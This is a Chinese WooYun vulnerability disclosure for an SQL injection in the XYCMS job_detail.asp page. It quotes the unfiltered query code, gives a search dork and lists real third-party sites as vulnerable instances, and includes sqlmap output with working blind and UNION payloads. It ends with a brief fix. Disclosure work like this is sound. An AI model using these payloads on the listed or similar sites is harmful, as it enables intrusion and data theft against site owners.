当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-089110

漏洞标题:XYCMS建站系统SQL注入#2

相关厂商:XYCMS

漏洞作者: 路人甲

提交时间:2014-12-31 14:27

修复时间:2015-03-31 14:28

公开时间:2015-03-31 14:28

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-12-31: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-03-31: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

XYCMS建站系统SQL注入#2

详细说明:

同第一个
XYCMS建站系统SQL注入#1
这里提交的在wooyun没有提交过!这里提交不重复,证明:

1228_t_10.png


除了:fwxm_detail.asp,news.asp,team_detail.asp这些外。。。
job_detail.asp未对id进行任何过滤就直接带入数据库查询

id=request.QueryString("id")
set rs=server.createobject("adodb.recordset")
exec="select * from zpxx where id="& id
rs.open exec,conn,1,1
if rs.eof then
response.Write "<div style=""padding:10px"">没有相关信息!</a>"
response.End()
end if


1228_t_11.png

漏洞证明:

搜索特征:
inurl:job_detail.asp?id=
实例:
http://www.qdzhihui.cn/job_detail.asp?id=22
http://www.jmofcole.com/job_detail.asp?id=3
http://www.cdmalc.com/job_detail.asp?id=2
http://www.czjt.com/job_detail.asp?id=386
http://www.shenzhouintl.com/cn_jt/job_detail.asp?id=26
http://www.njjldg.com/job_detail.asp?id=2
http://www.xmwx.org.cn/job_detail.asp?id=45
http://zqrc.com.cn/job_detail.asp?id=29763
http://www.zn-test.cn/job_detail.asp?id=2
http://www.qdzhihui.cn/job_detail.asp?id=23
...

1228_t_12.png


GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any
)? [y/N] n
sqlmap identified the following injection points with a total of 22 HTTP(s) requ
ests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=22 AND 3795=3795
Type: UNION query
Title: Generic UNION query (NULL) - 9 columns
Payload: id=-8961 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CHR(58)&CHR
(104)&CHR(118)&CHR(121)&CHR(58)&CHR(106)&CHR(85)&CHR(73)&CHR(88)&CHR(100)&CHR(68
)&CHR(68)&CHR(110)&CHR(69)&CHR(108)&CHR(58)&CHR(113)&CHR(107)&CHR(104)&CHR(58),N
ULL,NULL FROM MSysAccessObjects%00
---


修复方案:

加入防注入代码,对id获取的地方进行过滤。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

评论